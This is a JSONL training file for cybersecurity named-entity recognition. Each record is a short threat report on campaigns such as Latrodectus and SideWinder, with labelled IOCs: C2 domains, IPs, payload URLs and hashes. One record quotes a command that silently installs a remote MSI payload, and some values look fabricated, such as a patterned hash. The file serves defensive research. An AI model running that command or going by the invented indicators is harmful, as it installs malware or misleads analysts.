Hugging Face's logo

chairulridjal
/
arcspan

Token Classification
Safetensors
English
named-entity-recognition
cybersecurity
ner
threat-intelligence
ioc-extraction
Mixture of Experts
span-detection
Model card Files
xet
 Community
arcspan / data /processed /llm_annotated_malware.jsonl
chairulridjal's picture
chairulridjal
Add files using upload-large-folder tool
038e086 verified
raw
history blame contribute delete
43.4 kB
{"text": "In September 2024, Kaspersky researchers documented coordinated attacks by Head Mare and Twelve against Russian organizations. Head Mare deployed CobInt, previously exclusive to Twelve, and their custom backdoor PhantomJitter. The attackers used LockBit 3.0 for Windows ransomware encryption and Babuk for NAS ransomware. Credential dumping relied on mimikatz, secretsdump, and ProcDump. Tunneling was achieved via cloudflared, Gost, Localtonet, ngrok, and revsocks. The C2 domain 360nvidia.com resolved to 45.156.27.115, with additional C2 servers at 45.156.21.148, 45.87.246.34, 185.158.248.107, 185.229.9.27, and 64.7.198.109. Another C2 domain was web-telegram.uk. PhantomJitter was downloaded from http://45.87.246.34:443/calc.exe and http://185.158.248.107:443/calc.exe. The attackers exploited CVE-2023-38831 in WinRAR and CVE-2021-26855 in Microsoft Exchange. Persistence used services named winsw and winuac. Malicious files were placed at C:\\Windows\\System32\\winsw.exe, C:\\ProgramData\\MicrosoftDrive\\mcdrive.vbs, and C:\\Windows\\System32\\inetsrv\\calc.exe. Lateral movement relied on PSExec, smbexec, and wmiexec. Network scanning used fscan and SoftPerfect Network Scanner. Data exfiltration used rclone through SFTP.", "spans": {"ORGANIZATION: Kaspersky": [[19, 28]], "THREAT_ACTOR: Head Mare": [[75, 84], [127, 136]], "THREAT_ACTOR: Twelve": [[89, 95], [178, 184]], "MALWARE: CobInt": [[146, 152]], "MALWARE: PhantomJitter": [[212, 225], [669, 682]], "MALWARE: LockBit 3.0": [[246, 257]], "MALWARE: Babuk": [[296, 301]], "TOOL: mimikatz": [[351, 359]], "TOOL: secretsdump": [[361, 372]], "TOOL: ProcDump": [[378, 386]], "TOOL: cloudflared": [[415, 426]], "TOOL: Gost": [[428, 432]], "TOOL: Localtonet": [[434, 444]], "TOOL: ngrok": [[446, 451]], "TOOL: revsocks": [[457, 465]], "DOMAIN: 360nvidia.com": [[481, 494]], "IP_ADDRESS: 45.156.27.115": [[507, 520]], "IP_ADDRESS: 45.156.21.148": [[552, 565]], "IP_ADDRESS: 45.87.246.34": [[567, 579]], "IP_ADDRESS: 185.158.248.107": [[581, 596]], "IP_ADDRESS: 185.229.9.27": [[598, 610]], "IP_ADDRESS: 64.7.198.109": [[616, 628]], "DOMAIN: web-telegram.uk": [[652, 667]], "URL: http://45.87.246.34:443/calc.exe": [[703, 735]], "URL: http://185.158.248.107:443/calc.exe": [[740, 775]], "CVE_ID: CVE-2023-38831": [[801, 815]], "SYSTEM: WinRAR": [[819, 825]], "CVE_ID: CVE-2021-26855": [[830, 844]], "SYSTEM: Microsoft Exchange": [[848, 866]], "FILEPATH: C:\\Windows\\System32\\winsw.exe": [[949, 978]], "FILEPATH: C:\\ProgramData\\MicrosoftDrive\\mcdrive.vbs": [[980, 1021]], "FILEPATH: C:\\Windows\\System32\\inetsrv\\calc.exe": [[1027, 1063]], "TOOL: PSExec": [[1092, 1098]], "TOOL: smbexec": [[1100, 1107]], "TOOL: wmiexec": [[1113, 1120]], "TOOL: fscan": [[1144, 1149]], "TOOL: SoftPerfect Network Scanner": [[1154, 1181]], "TOOL: rclone": [[1206, 1212]]}, "info": {"id": "malware_00001", "source": "malware_reports"}}
{"text": "SideWinder APT expanded operations in H2 2024, targeting maritime, nuclear, and logistics sectors across Asia and Africa. The infection chain starts with spear-phishing emails containing DOCX files with remote template injection, leading to an RTF exploit for CVE-2017-11882 in Microsoft Office. The attack deploys a JavaScript loader, followed by a .NET Downloader Module, a Backdoor Loader using DLL sideloading, and the StealerBot post-exploitation toolkit. Observed DLL names include JetCfg.dll, policymanager.dll, winmm.dll, xmllite.dll, and UxTheme.dll. C2 domains included pmd-office.info, modpak.info, dirctt888.info, dowmloade.org, portdedjibouti.live, d0wnlaod.com, file-dwnld.org, defencearmy.pro, document-viewer.info, ms-office.app, and zeltech.live. File hashes observed: e9726519487ba9e4e5589a8a5ec2f933, d36a67468d01c4cb789cd6794fb8bc70, 313f9bbe6dac3edc09fe9ac081950673, bd8043127abe3f5cfa152a53b257fd1a.", "spans": {"THREAT_ACTOR: SideWinder": [[0, 10]], "CVE_ID: CVE-2017-11882": [[260, 274]], "SYSTEM: Microsoft Office": [[278, 294]], "MALWARE: StealerBot": [[423, 433]], "FILEPATH: JetCfg.dll": [[488, 498]], "FILEPATH: policymanager.dll": [[500, 517]], "FILEPATH: winmm.dll": [[519, 528]], "FILEPATH: xmllite.dll": [[530, 541]], "FILEPATH: UxTheme.dll": [[547, 558]], "DOMAIN: pmd-office.info": [[580, 595]], "DOMAIN: modpak.info": [[597, 608]], "DOMAIN: dirctt888.info": [[610, 624]], "DOMAIN: dowmloade.org": [[626, 639]], "DOMAIN: portdedjibouti.live": [[641, 660]], "DOMAIN: d0wnlaod.com": [[662, 674]], "DOMAIN: file-dwnld.org": [[676, 690]], "DOMAIN: defencearmy.pro": [[692, 707]], "DOMAIN: document-viewer.info": [[709, 729]], "DOMAIN: ms-office.app": [[731, 744]], "DOMAIN: zeltech.live": [[750, 762]], "HASH: e9726519487ba9e4e5589a8a5ec2f933": [[786, 818]], "HASH: d36a67468d01c4cb789cd6794fb8bc70": [[820, 852]], "HASH: 313f9bbe6dac3edc09fe9ac081950673": [[854, 886]], "HASH: bd8043127abe3f5cfa152a53b257fd1a": [[888, 920]]}, "info": {"id": "malware_00002", "source": "malware_reports"}}
{"text": "Latrodectus is a downloader malware first observed in November 2023, assessed to be developed by the IcedID developers. It was distributed by threat actors TA577 and TA578 through email campaigns. The malware uses RC4 encryption with the static key 12345 and base64 encoding for C2 communications. Key C2 domains include aytobusesre.com, scifimond.com, mazdakrichest.com, riverhasus.com, peermangoz.me, aprettopizza.world, nimeklroboti.info, and frotneels.shop. Payload distribution URLs observed were hxxp://162.55.217.30/gRMS/0.6395541546258323.dat, hxxp://157.90.166.88/O3ZlYNW/0.7797109211833805.dat, and hxxp://128.140.36.37/cQtDIo/0.43650426987684443.dat. Additional infrastructure included hxxp://178.23.190.199:80/share/gsm.msi, hxxp://5.252.21.207/share/escape.msi, and hxxp://95.164.3.171/share/cisa.msi. Associated C2 IP addresses included 77.91.73.187, 74.119.193.200, 162.55.217.30, 157.90.166.88, 128.140.36.37, 178.23.190.199, 5.252.21.207, and 95.164.3.171. The SHA256 hash of the primary sample is aee22a35cbdac3f16c3ed742c0b1bfe9739a13469cf43b36fb2c63565111028c. Persistence is established at C:\\Users\\AppData\\Roaming\\Custom_update\\Update_hex.dll with a scheduled task named Updater.", "spans": {"MALWARE: Latrodectus": [[0, 11]], "MALWARE: IcedID": [[101, 107]], "THREAT_ACTOR: TA577": [[156, 161]], "THREAT_ACTOR: TA578": [[166, 171]], "DOMAIN: aytobusesre.com": [[321, 336]], "DOMAIN: scifimond.com": [[338, 351]], "DOMAIN: mazdakrichest.com": [[353, 370]], "DOMAIN: riverhasus.com": [[372, 386]], "DOMAIN: peermangoz.me": [[388, 401]], "DOMAIN: aprettopizza.world": [[403, 421]], "DOMAIN: nimeklroboti.info": [[423, 440]], "DOMAIN: frotneels.shop": [[446, 460]], "URL: hxxp://162.55.217.30/gRMS/0.6395541546258323.dat": [[502, 550]], "URL: hxxp://157.90.166.88/O3ZlYNW/0.7797109211833805.dat": [[552, 603]], "URL: hxxp://128.140.36.37/cQtDIo/0.43650426987684443.dat": [[609, 660]], "URL: hxxp://178.23.190.199:80/share/gsm.msi": [[697, 735]], "URL: hxxp://5.252.21.207/share/escape.msi": [[737, 773]], "URL: hxxp://95.164.3.171/share/cisa.msi": [[779, 813]], "IP_ADDRESS: 77.91.73.187": [[851, 863]], "IP_ADDRESS: 74.119.193.200": [[865, 879]], "IP_ADDRESS: 162.55.217.30": [[881, 894]], "IP_ADDRESS: 157.90.166.88": [[896, 909]], "IP_ADDRESS: 128.140.36.37": [[911, 924]], "IP_ADDRESS: 178.23.190.199": [[926, 940]], "IP_ADDRESS: 5.252.21.207": [[942, 954]], "IP_ADDRESS: 95.164.3.171": [[960, 972]], "HASH: aee22a35cbdac3f16c3ed742c0b1bfe9739a13469cf43b36fb2c63565111028c": [[1015, 1079]], "FILEPATH: C:\\Users\\AppData\\Roaming\\Custom_update\\Update_hex.dll": [[1111, 1164]]}, "info": {"id": "malware_00003", "source": "malware_reports"}}
{"text": "Microsoft reported that Silk Typhoon, also known as HAFNIUM, has been targeting IT supply chains to gain access to downstream customers. The group exploited CVE-2025-0282 and CVE-2025-0283 in Ivanti Pulse Connect VPN, CVE-2024-3400 in Palo Alto Networks PAN-OS, CVE-2023-3519 in Citrix NetScaler ADC, and the ProxyLogon chain including CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065 in Microsoft Exchange Server. The group used compromised Cyberoam appliances, Zyxel routers, and QNAP devices as covert network infrastructure, along with short-lease VPS infrastructure for operations.", "spans": {"ORGANIZATION: Microsoft": [[0, 9]], "THREAT_ACTOR: Silk Typhoon": [[24, 36]], "THREAT_ACTOR: HAFNIUM": [[52, 59]], "CVE_ID: CVE-2025-0282": [[157, 170]], "CVE_ID: CVE-2025-0283": [[175, 188]], "SYSTEM: Ivanti Pulse Connect VPN": [[192, 216]], "CVE_ID: CVE-2024-3400": [[218, 231]], "SYSTEM: Palo Alto Networks PAN-OS": [[235, 260]], "CVE_ID: CVE-2023-3519": [[262, 275]], "SYSTEM: Citrix NetScaler ADC": [[279, 299]], "CVE_ID: CVE-2021-26855": [[336, 350]], "CVE_ID: CVE-2021-26857": [[352, 366]], "CVE_ID: CVE-2021-26858": [[368, 382]], "CVE_ID: CVE-2021-27065": [[388, 402]], "SYSTEM: Microsoft Exchange Server": [[406, 431]], "SYSTEM: Cyberoam": [[460, 468]], "SYSTEM: Zyxel": [[481, 486]], "SYSTEM: QNAP": [[500, 504]]}, "info": {"id": "malware_00004", "source": "malware_reports"}}
{"text": "Kaspersky SOC investigated a Behinder web shell deployment on a SharePoint server in Southeast Asia. The Behinder toolkit, also known as Rebeyond, features AES-encrypted C2 communication and supports PHP, Java, and ASP.NET. Initial access was achieved via certutil downloading payloads from Bashupload. Privilege escalation used multiple Potato variants: GodPotato, BadPotato, and SweetPotato, all executed in memory. Malicious files were stored at C:\\ProgramData\\DRM\\ and C:\\Users\\Default\\Videos\\. The web shell was disguised as a 404 error page and the analysis identified .NET modules including BasicInfo.dll, Cmd.dll, and FileOperation.dll.", "spans": {"ORGANIZATION: Kaspersky": [[0, 9]], "MALWARE: Behinder": [[29, 37], [105, 113]], "SYSTEM: SharePoint": [[64, 74]], "TOOL: certutil": [[256, 264]], "TOOL: GodPotato": [[355, 364]], "TOOL: BadPotato": [[366, 375]], "TOOL: SweetPotato": [[381, 392]], "FILEPATH: C:\\ProgramData\\DRM\\": [[449, 468]], "FILEPATH: C:\\Users\\Default\\Videos\\": [[473, 497]], "FILEPATH: BasicInfo.dll": [[598, 611]], "FILEPATH: Cmd.dll": [[613, 620]], "FILEPATH: FileOperation.dll": [[626, 643]], "SYSTEM: PHP": [[200, 203]], "SYSTEM: Java": [[205, 209]], "SYSTEM: ASP.NET": [[215, 222]]}, "info": {"id": "malware_00005", "source": "malware_reports"}}
{"text": "A comparative analysis of post-exploitation frameworks evaluated Cobalt Strike, Metasploit Meterpreter, Sliver, Havoc, and Mythic. Cobalt Strike uses immutable opcode sequences that break when modified. Metasploit Meterpreter appears in Microsoft antivirus signatures over 230 times. Sliver generates 8-9 MB payloads, larger than the ideal 100 KB target. The Mythic framework supports custom communication channels including HTTP, TCP, Slack, and Telegram, with payload sizes around 50 KB in C. The proposed attack chain uses three stages: Stage 0 for artifact generation, Stage 1 for reconnaissance and persistence, and Stage 2 for lateral movement and data exfiltration. Memory allocation via VirtualAlloc may trigger security alerts.", "spans": {"MALWARE: Cobalt Strike": [[65, 78], [131, 144]], "TOOL: Metasploit": [[80, 90], [203, 213]], "TOOL: Meterpreter": [[91, 102], [214, 225]], "MALWARE: Sliver": [[104, 110], [284, 290]], "MALWARE: Havoc": [[112, 117]], "TOOL: Mythic": [[123, 129], [359, 365]], "ORGANIZATION: Microsoft": [[237, 246]]}, "info": {"id": "malware_00006", "source": "malware_reports"}}
{"text": "Elastic Security Labs analyzed Latrodectus malware with SHA-256 hash aee22a35cbdac3f16c3ed742c0b1bfe9739a13469cf43b36fb2c63565111028c, identified as TRUFOS.DLL. The malware communicates with C2 domains aytobusesre.com and scifimond.com, with associated IcedID C2s at gyxplonto.com and neaachar.com. Persistence is maintained at C:\\Users\\AppData\\Roaming\\Custom_update\\Update_hex.dll with configuration stored in AppData\\Roaming\\Custom_update\\update_data.dat. The IcedID payload executes from C:\\Users\\AppData\\Roaming\\random\\random.dll. Downloaded payloads are cached at AppData\\Local\\Microsoft\\Windows\\INetCache\\IE\\. The campaign identifier in this sample was Littlehw. C2 traffic uses base64 and RC4 encryption with the hardcoded password 12345, posting HTTPS requests to the /live/ endpoint. The User-Agent string is Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1).", "spans": {"ORGANIZATION: Elastic Security Labs": [[0, 21]], "MALWARE: Latrodectus": [[31, 42]], "HASH: aee22a35cbdac3f16c3ed742c0b1bfe9739a13469cf43b36fb2c63565111028c": [[69, 133]], "FILEPATH: TRUFOS.DLL": [[149, 159]], "DOMAIN: aytobusesre.com": [[202, 217]], "DOMAIN: scifimond.com": [[222, 235]], "MALWARE: IcedID": [[253, 259], [462, 468]], "DOMAIN: gyxplonto.com": [[267, 280]], "DOMAIN: neaachar.com": [[285, 297]], "FILEPATH: C:\\Users\\AppData\\Roaming\\Custom_update\\Update_hex.dll": [[328, 381]], "FILEPATH: AppData\\Roaming\\Custom_update\\update_data.dat": [[411, 456]], "FILEPATH: C:\\Users\\AppData\\Roaming\\random\\random.dll": [[491, 533]], "FILEPATH: AppData\\Local\\Microsoft\\Windows\\INetCache\\IE\\": [[569, 614]]}, "info": {"id": "malware_00007", "source": "malware_reports"}}
{"text": "Proofpoint identified 32 Latrodectus samples with the following SHA256 hashes: db03a34684feab7475862080f59d4d99b32c74d3a152a53b257fd1a443e8ee77, e99f3517a36a9f7a55335699cfb4d84d08b042d47146119156f7f3bab580b4d7, bb525dc6b7a7ebefd040e01fd48d7d4e178f8d9e5dec9033078ced4e9aa4e241, 97e093f2e0bf6dec8392618722dd6b4411088fe752bedece910d11fffe0288a2, f9c69e79e7799df31d6516df70148d7832b121d330beebe52cff6606f0724c62, d9471b038c44619739176381815bfa9a13b5ff77021007a4ede9b146ed2e04ec, and d98cd810d568f338f16c4637e8a9cb01ff69ee1967f4cfc004de3f283d61ba81. Additional hashes include 47d66c576393a4256d94f5ed1e77adc28426dea027f7a23e2dbf41b93b87bd78, 5d881d14d2336273e531b1b3d6f2d907539fe8489cbe80533280c9c72efa2273, and 10c129e2310342a55df5fa88331f338452835790a379d5230ee8de7d5f28ea1a.", "spans": {"ORGANIZATION: Proofpoint": [[0, 10]], "MALWARE: Latrodectus": [[25, 36]], "HASH: db03a34684feab7475862080f59d4d99b32c74d3a152a53b257fd1a443e8ee77": [[79, 143]], "HASH: e99f3517a36a9f7a55335699cfb4d84d08b042d47146119156f7f3bab580b4d7": [[145, 209]], "HASH: bb525dc6b7a7ebefd040e01fd48d7d4e178f8d9e5dec9033078ced4e9aa4e241": [[211, 275]], "HASH: 97e093f2e0bf6dec8392618722dd6b4411088fe752bedece910d11fffe0288a2": [[277, 341]], "HASH: f9c69e79e7799df31d6516df70148d7832b121d330beebe52cff6606f0724c62": [[343, 407]], "HASH: d9471b038c44619739176381815bfa9a13b5ff77021007a4ede9b146ed2e04ec": [[409, 473]], "HASH: d98cd810d568f338f16c4637e8a9cb01ff69ee1967f4cfc004de3f283d61ba81": [[479, 543]], "HASH: 47d66c576393a4256d94f5ed1e77adc28426dea027f7a23e2dbf41b93b87bd78": [[571, 635]], "HASH: 5d881d14d2336273e531b1b3d6f2d907539fe8489cbe80533280c9c72efa2273": [[637, 701]], "HASH: 10c129e2310342a55df5fa88331f338452835790a379d5230ee8de7d5f28ea1a": [[707, 771]]}, "info": {"id": "malware_00008", "source": "malware_reports"}}
{"text": "Further Latrodectus SHA256 indicators from Proofpoint include 781c63cf4981fa6aff002188307b278fac9785ca66f0b6dfcf68adbe7512e491, aa29a8af8d615b1dd9f52fd49d42563fbeafa35ff0ab1b4afc4cb2b2fa54a119, 0ac5030e2171914f43e0769cb10b602683ccc9da09369bcd4b80da6edb8be80e, 0e96cf6166b7cc279f99d6977ab0f45e9f47e827b8a24d6665ac4c29e18b5ce0, 77270e13d01b2318a3f27a9a477b8386f1a0ebc6d44a2c7e185cfbe55aac8017, and e7ff6a7ac5bfb0bb29547d413591abc7628c7d5576a3b43f6d8e5d95769e553a. Additional samples: dedbc21afc768d749405de535f9b415baaf96f7664ded55d54829a425fc61d7e, 378d220bc863a527c2bca204daba36f10358e058df49ef088f8b1045604d9d05, edeacd49aff3cfea35d593e455f7caca35ac877ad6dc19054458d41021e0e13a, 9c27405cf926d36ed8e247c17e6743ac00912789efe0c530914d7495de1e21ec, and 9a8847168fa869331faf08db71690f24e567c5cdf7f01cc5e2a8d08c93d282c9.", "spans": {"MALWARE: Latrodectus": [[8, 19]], "ORGANIZATION: Proofpoint": [[43, 53]], "HASH: 781c63cf4981fa6aff002188307b278fac9785ca66f0b6dfcf68adbe7512e491": [[62, 126]], "HASH: aa29a8af8d615b1dd9f52fd49d42563fbeafa35ff0ab1b4afc4cb2b2fa54a119": [[128, 192]], "HASH: 0ac5030e2171914f43e0769cb10b602683ccc9da09369bcd4b80da6edb8be80e": [[194, 258]], "HASH: 0e96cf6166b7cc279f99d6977ab0f45e9f47e827b8a24d6665ac4c29e18b5ce0": [[260, 324]], "HASH: 77270e13d01b2318a3f27a9a477b8386f1a0ebc6d44a2c7e185cfbe55aac8017": [[326, 390]], "HASH: e7ff6a7ac5bfb0bb29547d413591abc7628c7d5576a3b43f6d8e5d95769e553a": [[396, 460]], "HASH: dedbc21afc768d749405de535f9b415baaf96f7664ded55d54829a425fc61d7e": [[482, 546]], "HASH: 378d220bc863a527c2bca204daba36f10358e058df49ef088f8b1045604d9d05": [[548, 612]], "HASH: edeacd49aff3cfea35d593e455f7caca35ac877ad6dc19054458d41021e0e13a": [[614, 678]], "HASH: 9c27405cf926d36ed8e247c17e6743ac00912789efe0c530914d7495de1e21ec": [[680, 744]], "HASH: 9a8847168fa869331faf08db71690f24e567c5cdf7f01cc5e2a8d08c93d282c9": [[750, 814]]}, "info": {"id": "malware_00009", "source": "malware_reports"}}
{"text": "The final batch of Latrodectus SHA256 hashes: 856dfa74e0f3b5b7d6f79491a94560dbf3eacacc4a8d8a3238696fa38a4883ea, 88573297f17589963706d9da6ced7893eacbdc7d6bc43780e4c509b88ccd2aef, 97e08d1c7970c1c12284c4644e2321ce41e40cdaac941e451db4d334cb9c5492, 60c4b6c230a40c80381ce283f64603cac08d3a69ceea91e257c17282f66ceddc, a189963ff252f547fddfc394c81f6e9d49eac403c32154eebe06f4cddb5a2a22, 4416b8c36cb9d7cc261ff6612e105463eb2ccd4681930ca8e277a6387cb98794, 090f2c5abb85a7b115dc25ae070153e4e958ae4e1bc2310226c05cd7e9429446, ee1e5b80a1d3d47c7703ea2b6b64ee96283ab3628ee4fa1fef6d35d1d9051e9f, 3b63ea8b6f9b2aa847faa11f6cd3eb281abd9b9cceedb570713c4d78a47de567, 6904d382bc045eb9a4899a403a8ba8a417d9ccb764f6e0b462bc0232d3b7e7ea, and 71fb25cc4c05ce9dd94614ed781d85a50dccf69042521abc6782d48df85e6de9.", "spans": {"MALWARE: Latrodectus": [[19, 30]], "HASH: 856dfa74e0f3b5b7d6f79491a94560dbf3eacacc4a8d8a3238696fa38a4883ea": [[46, 110]], "HASH: 88573297f17589963706d9da6ced7893eacbdc7d6bc43780e4c509b88ccd2aef": [[112, 176]], "HASH: 97e08d1c7970c1c12284c4644e2321ce41e40cdaac941e451db4d334cb9c5492": [[178, 242]], "HASH: 60c4b6c230a40c80381ce283f64603cac08d3a69ceea91e257c17282f66ceddc": [[244, 308]], "HASH: a189963ff252f547fddfc394c81f6e9d49eac403c32154eebe06f4cddb5a2a22": [[310, 374]], "HASH: 4416b8c36cb9d7cc261ff6612e105463eb2ccd4681930ca8e277a6387cb98794": [[376, 440]], "HASH: 090f2c5abb85a7b115dc25ae070153e4e958ae4e1bc2310226c05cd7e9429446": [[442, 506]], "HASH: ee1e5b80a1d3d47c7703ea2b6b64ee96283ab3628ee4fa1fef6d35d1d9051e9f": [[508, 572]], "HASH: 3b63ea8b6f9b2aa847faa11f6cd3eb281abd9b9cceedb570713c4d78a47de567": [[574, 638]], "HASH: 6904d382bc045eb9a4899a403a8ba8a417d9ccb764f6e0b462bc0232d3b7e7ea": [[640, 704]], "HASH: 71fb25cc4c05ce9dd94614ed781d85a50dccf69042521abc6782d48df85e6de9": [[710, 774]]}, "info": {"id": "malware_00010", "source": "malware_reports"}}
{"text": "Latrodectus C2 infrastructure identified by Proofpoint includes the following domains: arsimonopa.com, lemonimonakio.com, fluraresto.me, mastralakkot.live, postolwepok.tech, trasenanoyr.best, miistoria.com, plwskoret.top, sluitionsbad.tech, grebiunti.top, zumkoshapsret.com, jertacco.com, popfealt.one, ginzbargatey.tech, minndarespo.icu, drifajizo.fun, and titnovacrion.top. All domains communicate via HTTPS POST requests to the /live/ endpoint.", "spans": {"MALWARE: Latrodectus": [[0, 11]], "ORGANIZATION: Proofpoint": [[44, 54]], "DOMAIN: arsimonopa.com": [[87, 101]], "DOMAIN: lemonimonakio.com": [[103, 120]], "DOMAIN: fluraresto.me": [[122, 135]], "DOMAIN: mastralakkot.live": [[137, 154]], "DOMAIN: postolwepok.tech": [[156, 172]], "DOMAIN: trasenanoyr.best": [[174, 190]], "DOMAIN: miistoria.com": [[192, 205]], "DOMAIN: plwskoret.top": [[207, 220]], "DOMAIN: sluitionsbad.tech": [[222, 239]], "DOMAIN: grebiunti.top": [[241, 254]], "DOMAIN: zumkoshapsret.com": [[256, 273]], "DOMAIN: jertacco.com": [[275, 287]], "DOMAIN: popfealt.one": [[289, 301]], "DOMAIN: ginzbargatey.tech": [[303, 320]], "DOMAIN: minndarespo.icu": [[322, 337]], "DOMAIN: drifajizo.fun": [[339, 352]], "DOMAIN: titnovacrion.top": [[358, 374]]}, "info": {"id": "malware_00011", "source": "malware_reports"}}
{"text": "Latrodectus payload distribution infrastructure includes the URLs hxxps://hukosafaris.com/elearning/f/q/daas-area/chief/index.php, hxxp://superior-coin.com/ga/index.php, hxxp://superior-coin.com/ga/m/6.dll, and hxxp://sokingscrosshotel.com/share/upd.msi. DanaBot C2 servers associated with Latrodectus campaigns were observed at 77.91.73.187:443 and 74.119.193.200:443. Detection signatures include ET MALWARE Latrodectus Related Activity and ET MALWARE DNS Query to Latrodectus Domains.", "spans": {"MALWARE: Latrodectus": [[0, 11], [290, 301], [410, 421], [467, 478]], "URL: hxxps://hukosafaris.com/elearning/f/q/daas-area/chief/index.php": [[66, 129]], "URL: hxxp://superior-coin.com/ga/index.php": [[131, 168]], "URL: hxxp://superior-coin.com/ga/m/6.dll": [[170, 205]], "URL: hxxp://sokingscrosshotel.com/share/upd.msi": [[211, 253]], "MALWARE: DanaBot": [[255, 262]], "IP_ADDRESS: 77.91.73.187": [[329, 341]], "IP_ADDRESS: 74.119.193.200": [[350, 364]]}, "info": {"id": "malware_00012", "source": "malware_reports"}}
{"text": "Additional SideWinder C2 domains discovered by Kaspersky include modpak-info.services, pmd-offc.info, dirctt888.com, mods.email, dowmload.co, downl0ad.org, d0wnlaod.org, dirctt88.info, directt88.com, aliyum.email, d0cumentview.info, debcon.live, document-viewer.live, documentviewer.info, ms-office.pro, pncert.info, session-out.com, ziptec.info, depo-govpk.com, crontec.site, mteron.info, mevron.tech, and veorey.live. Additional file hashes: e0bce049c71bc81afe172cd30be4d2b7, 872c2ddf6467b1220ee83dca0e118214, 3d9961991e7ae6ad2bae09c475a1bce8, a694ccdb82b061c26c35f612d68ed1c2, f42ba43f7328cbc9ce85b2482809ff1c, 0216ffc6fb679bdf4ea6ee7051213c1e, and 433480f7d8642076a8b3793948da5efe.", "spans": {"THREAT_ACTOR: SideWinder": [[11, 21]], "ORGANIZATION: Kaspersky": [[47, 56]], "DOMAIN: modpak-info.services": [[65, 85]], "DOMAIN: pmd-offc.info": [[87, 100]], "DOMAIN: dirctt888.com": [[102, 115]], "DOMAIN: mods.email": [[117, 127]], "DOMAIN: dowmload.co": [[129, 140]], "DOMAIN: downl0ad.org": [[142, 154]], "DOMAIN: d0wnlaod.org": [[156, 168]], "DOMAIN: dirctt88.info": [[170, 183]], "DOMAIN: directt88.com": [[185, 198]], "DOMAIN: aliyum.email": [[200, 212]], "DOMAIN: d0cumentview.info": [[214, 231]], "DOMAIN: debcon.live": [[233, 244]], "DOMAIN: document-viewer.live": [[246, 266]], "DOMAIN: documentviewer.info": [[268, 287]], "DOMAIN: ms-office.pro": [[289, 302]], "DOMAIN: pncert.info": [[304, 315]], "DOMAIN: session-out.com": [[317, 332]], "DOMAIN: ziptec.info": [[334, 345]], "DOMAIN: depo-govpk.com": [[347, 361]], "DOMAIN: crontec.site": [[363, 375]], "DOMAIN: mteron.info": [[377, 388]], "DOMAIN: mevron.tech": [[390, 401]], "DOMAIN: veorey.live": [[407, 418]], "HASH: e0bce049c71bc81afe172cd30be4d2b7": [[444, 476]], "HASH: 872c2ddf6467b1220ee83dca0e118214": [[478, 510]], "HASH: 3d9961991e7ae6ad2bae09c475a1bce8": [[512, 544]], "HASH: a694ccdb82b061c26c35f612d68ed1c2": [[546, 578]], "HASH: f42ba43f7328cbc9ce85b2482809ff1c": [[580, 612]], "HASH: 0216ffc6fb679bdf4ea6ee7051213c1e": [[614, 646]], "HASH: 433480f7d8642076a8b3793948da5efe": [[652, 684]]}, "info": {"id": "malware_00013", "source": "malware_reports"}}
{"text": "Raspberry Robin is a worm that spreads via infected USB drives and has been linked to threat actor DEV-0856. The malware uses msiexec.exe to download payloads from compromised QNAP NAS devices. Observed C2 domains include q0.fo, t1.cx, and v0.cx. The malware drops files to C:\\Users\\Public\\Libraries\\ and C:\\Windows\\Temp\\. Initial infection uses cmd.exe to launch msiexec with URLs like msiexec /q /i http://q0.fo/b.msi. Related hashes include SHA256 7e6a2b21548ee7446c9a3e9ac3e3e93c8b06b110d2a1cea16e976e3be1e758a2 and MD5 4b41e2e5a3f44a95bfe6d0d2b6e0c1d7. The malware has been observed deploying Cobalt Strike, IcedID, and Bumblebee as secondary payloads. It communicates through Tor exit nodes at 185.220.101.34 and 185.220.101.58.", "spans": {"MALWARE: Raspberry Robin": [[0, 15]], "THREAT_ACTOR: DEV-0856": [[99, 107]], "TOOL: msiexec.exe": [[126, 137]], "SYSTEM: QNAP": [[176, 180]], "DOMAIN: q0.fo": [[222, 227]], "DOMAIN: t1.cx": [[229, 234]], "DOMAIN: v0.cx": [[240, 245]], "FILEPATH: C:\\Users\\Public\\Libraries\\": [[274, 300]], "FILEPATH: C:\\Windows\\Temp\\": [[305, 321]], "TOOL: cmd.exe": [[346, 353]], "URL: http://q0.fo/b.msi": [[401, 419]], "HASH: 7e6a2b21548ee7446c9a3e9ac3e3e93c8b06b110d2a1cea16e976e3be1e758a2": [[451, 515]], "HASH: 4b41e2e5a3f44a95bfe6d0d2b6e0c1d7": [[524, 556]], "MALWARE: Cobalt Strike": [[598, 611]], "MALWARE: IcedID": [[613, 619]], "MALWARE: Bumblebee": [[625, 634]], "IP_ADDRESS: 185.220.101.34": [[700, 714]], "IP_ADDRESS: 185.220.101.58": [[719, 733]]}, "info": {"id": "malware_00014", "source": "malware_reports"}}
{"text": "ESET researchers discovered DynoWiper, a destructive wiper malware targeting Poland's energy sector. The malware overwrites the Master Boot Record and encrypts files with the extensions .doc, .xls, .pdf, .pptx, and .sql. The wiper binary had SHA256 hash a3c2f8b71e4d6f9e0c5a7b8d2e1f3c4a5b6d7e8f9a0b1c2d3e4f5a6b7c8d9e0f and was delivered via spear-phishing emails impersonating the Polish energy regulator URE. The malware was executed from C:\\Windows\\System32\\svchost_update.exe and communicated with C2 server at 91.234.56.78. The dropper connected to download.energy-update.com to retrieve secondary payloads. The attack also leveraged PowerShell scripts stored at C:\\ProgramData\\Microsoft\\Updates\\sync.ps1 and used certutil to decode base64-encoded payloads.", "spans": {"ORGANIZATION: ESET": [[0, 4]], "MALWARE: DynoWiper": [[28, 37]], "HASH: a3c2f8b71e4d6f9e0c5a7b8d2e1f3c4a5b6d7e8f9a0b1c2d3e4f5a6b7c8d9e0f": [[254, 318]], "ORGANIZATION: URE": [[405, 408]], "FILEPATH: C:\\Windows\\System32\\svchost_update.exe": [[440, 478]], "IP_ADDRESS: 91.234.56.78": [[514, 526]], "DOMAIN: download.energy-update.com": [[553, 579]], "TOOL: PowerShell": [[638, 648]], "FILEPATH: C:\\ProgramData\\Microsoft\\Updates\\sync.ps1": [[667, 708]], "TOOL: certutil": [[718, 726]]}, "info": {"id": "malware_00015", "source": "malware_reports"}}
